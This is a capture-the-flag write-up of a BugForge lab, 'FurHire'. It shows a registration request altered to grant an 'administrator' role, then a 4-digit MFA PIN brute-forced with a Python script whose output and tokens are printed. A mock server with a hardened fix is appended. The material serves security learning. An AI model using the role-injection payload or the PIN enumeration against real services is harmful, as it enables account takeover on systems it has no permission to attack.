BugForge Write-Up 2/22/2026

  • icanhaspii
  • Feb 28
  • 2 min read

  • BugForge Daily Challenge 2/22/2026 - FurHire



Hint: Your window is small, you might have to try multiple times.



Note:

If there is an admin account active for a lab, the credentials are admin:admin123


  • I launched Burp.


  • I checked to see if there was an admin login using the set/known creds, but there was not.


  • Next, I created a Job Seeker account and was taken to an app that appeared to behave a lot like an online job search platform. Following along with the @B1gB33f write-up, I wanted to take a closer look at the "POST /api/register" traffic, so I highlighted that line, then right-clicked and selected "Send to Repeater".


  • Next, moving over to the Burp "Repeater" tab, in the "Replay" "Request" pane, I changed the following to turn my plain user account into an admin-level account, and it worked!

{
"role":"user", 
"username":"Tester1", 
"email":"Tester1@AOL.com", 
"full_name":"Tester One", 
"password":"Password" 
}

to:

{
"role":"administrator", 
"username":"attacker", 
"email":"attacker@AOL.com", 
"full_name":"attacker test", 
"password":"Password" 
}

  • I got back the following in the "Response" pane:


{ "token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NywidXNlcm5hbWUiOiJhdHRhY2tlciIsInJvbGUiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzcxODU3Mjg1fQ.Osr2pq_NJ35iNs7oTTUe_f0bmaM-aMDuMVxPCPny65Q", 
"user":{ 
"id":7, 
"username":"attacker", 
"email":"attacker@AOL.com", 
"full_name":"attacker test", 
"role":"administrator" 
}, 
"needsOnboarding":true 
}

  • Next, over in the browser, I logged out of the application and then back in using my new admin creds, and that worked, so I knew I had a working login.


  • Next, I adapted the Python script from the @B1gB33f write-up and let it run its course. I got a token and a PIN, but I couldn't seem to get it to work at "/api/admin/content" or anywhere else in the app. Note: You might need to run the Python script 2-3 times before it actually grabs a token/PIN combo.

[6286] PIN 6286 -> 200 {'success': True, 'message': 'MFA verification successful'} 
[!!!] VALID PIN: 6286 
[!!!] Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NywidXNlcm5hbWUiOiJhdHRhY2tlciIsInJvbGUiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzcxODYxMzY0fQ.fiibPePzCyIf8A-5q9ccBjIocHTzEyRhmOmVehBtvfk 

  • Finally, the following added tip from @B1gB33f worked!!!


>>OK, so create an administrator account and log in - sit at the MFA screen - run the script as that user - token hits and we get the success message - hit /admin in the browser. I just did it and it worked.<<


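As an added example (not the lab's code and not the @B1gB33f script), the following Python models the two weaknesses this challenge chains together: a registration endpoint that copies a client-supplied "role" into the account and into the JWT it issues, and an MFA step whose 4-digit PIN can be enumerated faster than it rotates. The server class is a constructed stand-in; the 30-second PIN window, the HS256 secret handling and the lack of attempt limiting are assumptions, not details taken from FurHire. The only real artifact used is the token from the write-up above, whose payload is decoded to show the role claim the lab actually issued. A hardened registration that ignores the client's role is shown beside the vulnerable one.

```python
"""Added example: mock of the FurHire flow (role mass assignment -> admin JWT ->
MFA PIN brute force). The server side is a constructed stand-in, not the lab's code."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Token returned by the lab in the write-up above; its payload carries the role claim.
WRITEUP_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6NywidXNlcm5hbWUiOiJhdHRhY2tlciIsInJvbGUiOiJhZG1pbmlzdHJhdG9yIiwiaWF0IjoxNzcxODU3Mjg1fQ."
    "Osr2pq_NJ35iNs7oTTUe_f0bmaM-aMDuMVxPCPny65Q"
)


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def decode_jwt_payload(token: str) -> dict:
    """Read the claims without checking the signature (enough to see what the server issued)."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Minimal HS256 JWT signer so the example runs without PyJWT."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


class VulnerableFurHire:
    """Constructed stand-in for the lab backend (assumptions: 4-digit PIN, 30 s window,
    no attempt limit). Flaw 1: register() trusts the client-supplied role.
    Flaw 2: mfa_verify() accepts 10,000 guesses inside one PIN window."""

    PIN_WINDOW_SECONDS = 30

    def __init__(self, clock=time.time):
        self.secret = secrets.token_bytes(32)
        self.clock = clock
        self.next_id = 1

    def register(self, body: dict) -> dict:
        # Mass assignment: "role" is copied straight from the request body.
        user = {"id": self.next_id, "username": body["username"], "role": body.get("role", "user")}
        self.next_id += 1
        token = sign_hs256({**user, "iat": int(self.clock())}, self.secret)
        return {"token": token, "user": user, "needsOnboarding": True}

    def current_pin(self) -> str:
        # The PIN is derived from the current time window, so it changes every 30 s.
        window = int(self.clock()) // self.PIN_WINDOW_SECONDS
        digest = hmac.new(self.secret, str(window).encode(), hashlib.sha256).digest()
        return f"{int.from_bytes(digest[:4], 'big') % 10000:04d}"

    def mfa_verify(self, token: str, pin: str) -> dict:
        # No rate limit and no lockout: the only defence is the short window.
        if pin == self.current_pin():
            return {"success": True, "message": "MFA verification successful"}
        return {"success": False, "message": "Invalid PIN"}


def register_hardened(server: VulnerableFurHire, body: dict) -> dict:
    """Fix for flaw 1: the role is assigned server-side and never read from the client."""
    safe_body = {k: v for k, v in body.items() if k != "role"}
    return server.register({**safe_body, "role": "user"})


def brute_force_pin(server: VulnerableFurHire, token: str) -> Optional[str]:
    """Walk 0000-9999 against the MFA check; returns the PIN that succeeded, or None if
    the window rolled over first (the write-up's 'run it 2-3 times')."""
    for candidate in range(10000):
        pin = f"{candidate:04d}"
        if server.mfa_verify(token, pin)["success"]:
            return pin
    return None


if __name__ == "__main__":
    print("role in write-up token:", decode_jwt_payload(WRITEUP_TOKEN)["role"])
    lab = VulnerableFurHire()
    resp = lab.register({"role": "administrator", "username": "attacker",
                         "email": "attacker@AOL.com", "full_name": "attacker test",
                         "password": "Password"})
    print("issued role:", resp["user"]["role"])
    print("hardened role:", register_hardened(lab, {"role": "administrator", "username": "x"})["user"]["role"])
    print("brute-forced PIN:", brute_force_pin(lab, resp["token"]))
```

Against the real lab the loop body would be an HTTP request carrying the registration token, and the run can fail if the PIN rotates mid-enumeration, which is why the script sometimes needs a second or third attempt. The fix for the second flaw is attempt limiting or lockout on the MFA endpoint; the short window alone is not a defence against 10,000 unthrottled guesses.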


##### End of Report ##### 
